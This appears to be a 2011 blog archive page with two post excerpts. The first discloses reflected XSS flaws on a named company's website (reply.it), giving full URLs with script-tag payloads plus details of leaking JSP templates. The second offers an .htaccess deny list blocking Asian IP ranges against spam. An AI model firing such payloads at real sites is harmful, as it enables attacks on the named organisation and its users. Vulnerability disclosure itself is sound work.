Skip to main content

Posts

Showing posts from November, 2011

XSS www.reply.it - sec. vulnerabilities

XSS
reply.it/it/search/?lang=IT&search=<script>alert(1);</script>
XSS
http://www.reply.it/en/tagSearch?tags=Financial+Reports%3Cscript%3Ealert%281%29;%3C/script%3E

mirror (?) - same
http://d3v578iyw1eidm.cloudfront.net/



several problems in the jsp scripts (unmanaged null exceptions, data of the template, data, etc)

template(?) is visible by requesting a wrong id (?)
http://reply.it/it/practices/cloudcomputing/readd,7700-


sample of the output (ex. http://reply.it/it/practices/cloudcomputing/readd,7700- )
---------------<div class="yui-gc clear" id="unacolonna"> <div class="yui-u first" id="col_2_3_sx"> <div class="tab"> ^service_link^ ^tag_contenuto^ ^dettaglio_contenuto^ <…

Block Spam from Asia china .htaccess solution

After receiving tons of spam on the website I've decided to ban the whole apnic...
previously I've tried to ban only china and korea but without success.
Since I've not found anything to ban the whole APNIC I've searched for the assigned classes that they manage.

P.S. I've added a few LACNIC

just add this in a .htaccess file and the spam from the Asia should be gone

#list retrieved from
#http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt

#Banning APNIC
deny from 1.0.0.0/8
deny from 27.0.0.0/8
deny from 36.0.0.0/8
deny from 39.0.0.0/8
deny from 42.0.0.0/8
deny from 43.0.0.0/8
deny from 49.0.0.0/8
deny from 58.0.0.0/8
deny from 59.0.0.0/8
deny from 60.0.0.0/8
deny from 61.0.0.0/8
deny from 101.0.0.0/8
deny from 103.0.0.0/8
deny from 106.0.0.0/8
deny from 110.0.0.0/8
deny from 111.0.0.0/8
deny from 112.0.0.0/8
deny from 113.0.0.0/8
deny from 114.0.0.0/8
deny from 115.0.0.0/8
deny from 116.0.0.0/8
deny from 117.0.0.0/8
deny from 118.0.0.0/8
deny …